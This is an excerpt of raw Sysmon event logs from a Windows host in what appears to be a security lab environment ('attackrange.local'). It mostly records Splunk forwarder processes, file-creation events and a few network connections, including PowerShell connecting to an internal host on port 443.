14:59:04.729{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342265Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:04.729{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342264Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:04.729{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-72B8-613B-2FB4-03000000C801}6484C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342263Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:04.713{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-72B8-613B-2FB4-03000000C801}6484C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342262Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:04.708{B81B27B7-72B8-613B-2FB4-03000000C801}6484C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342261Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:04.328{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=837A62D8E299B100E2A4C55B5319D361,SHA256=4B1E798CD65EFA0CA36CB19CE325B2977204688808CA2A6E95930EBA6D55860F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342260Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:04.290{B81B27B7-72B8-613B-2EB4-03000000C801}36005316C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342259Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:04.112{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-72B8-613B-2EB4-03000000C801}3600C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342258Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:04.112{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342257Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:04.112{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342256Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:04.111{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342255Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:04.111{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342254Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:04.111{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-72B8-613B-2EB4-03000000C801}3600C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342253Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:04.111{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-72B8-613B-2EB4-03000000C801}3600C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342252Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:04.092{B81B27B7-72B8-613B-2EB4-03000000C801}3600C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342272Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:05.344{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33FED7A489DE9E02513C673544F8B452,SHA256=EA3BE7B77001396E92AEBC1AF4429E35C7578AB1DF5AEC5C6551A6068169964A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342271Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:05.191{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9F3BB5BCD3AE6D71A20CF7A21A86785,SHA256=98F9DA856DB67530126E8E71EA6B63E69CEB5548FE3758AE69A6CBD1BED15992,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342270Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:05.191{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AC716530E7D3DCAC22A4D3C4D619B0A6,SHA256=22742B73FD1C905EC264802D49780B722DEB117EA2D983B669083D229C6504E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342273Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:06.359{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5605E8687F21573CD1D058CB5451BB82,SHA256=569D05BE4B0A4F9509ACC1367E7F4334D63D1E1F0A88F212F5F1F6AF80525FAD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342275Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:33.205{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52408-false10.0.1.12-8000- 23542300x800000000000000035342274Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:07.374{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC5B1A2578FC0539A0538EE72B1A7993,SHA256=6DAC9ACEB5B2CB2A9C8062C0685424099E3D32DFE2960A55D9403C16F9B0B7D2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342277Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:08.407{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=569F61EB4E6812E0AE5F7B1CE4163E3F,SHA256=80BED4053DCC7B2C5DA967F0F4819362810BC48580D952334DEE849548B2DCCD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342276Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:08.341{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8E6ADAAA413558ACB8EB9B4A369D2FA9,SHA256=14FB36D2DE80C913148DF843C579C2D49D2DAAD51A0CAD1318730CFC869029A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342278Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:09.425{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84B826AF2EC3335A40158D14FA4076EC,SHA256=5A25267DA8502B2F927A453BFC56022B4C6DF394B75AE4C83BBB6F04E1EBCF58,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342280Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:10.471{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76F1960595D56369D0F7C4BC1C69EA8D,SHA256=8BF59479E984F1BED1BD65A0BBDF09B3F1C4E9B6327D43ED7FBE859CA3743ED9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342279Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:34.205{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52409-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342281Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:11.486{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0B7262DED4E0469A6AD844DADCCF3C9,SHA256=23F385CE3BCD8465A0D0C7980A96776F6DD4839F13E7228F2922A391D53EF46C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342282Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:12.502{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B1D83D850758ABBE8A2A78845EDB8F3,SHA256=A1A13E29D67ED8206AA8886CFF4E2C6D91E15274B6B3FB41D62AFB0436AE3B81,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342283Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:13.521{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2C84E9CE6B078FBC74255CFAE282B22,SHA256=575AD8B2DDC38185650B97BCD2BAF5864A52AC487E59C3A65DEB80E725DB8A30,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342286Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:14.552{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B6DE817999073B3C0D007941A962DB2,SHA256=8687BF4307DB9A0AA092801FBC6A785F20FE01DE2CCA6883151453E6AAFA8A51,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342285Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:14.452{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=387BD6FDE03B8EB664B4E0665272396C,SHA256=40263B21F9C40CB9A486F1FE69EFA83EA5D76730B6B9F302403B78F9C1343376,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342284Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:39.053{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52410-false10.0.1.12-8000- 23542300x800000000000000035342288Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:15.599{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=997720838200C012360FF8BC7A0EEE59,SHA256=BBDC13910824130AF5D6616028445497550B66AFE9FE9FEEC09C7F8CB34AE593,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342287Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:40.221{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52411-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342289Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:16.649{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDA71F4F6B1F197F8EE65F973EF7EDB5,SHA256=D37458134416E047D68C7CFAB65835C935C450AB9B588DB0B02D4D9BAFB7B73B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342299Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:17.664{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F626A3F055FC9F1963680B9EDC92B30,SHA256=F46E9F190B04689A8DC662AB064108AEC560C7CB2A3D7938A8BBFC5DE94B63FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342298Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:17.548{B81B27B7-72C5-613B-30B4-03000000C801}55324608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342297Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:17.401{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-72C5-613B-30B4-03000000C801}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342296Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 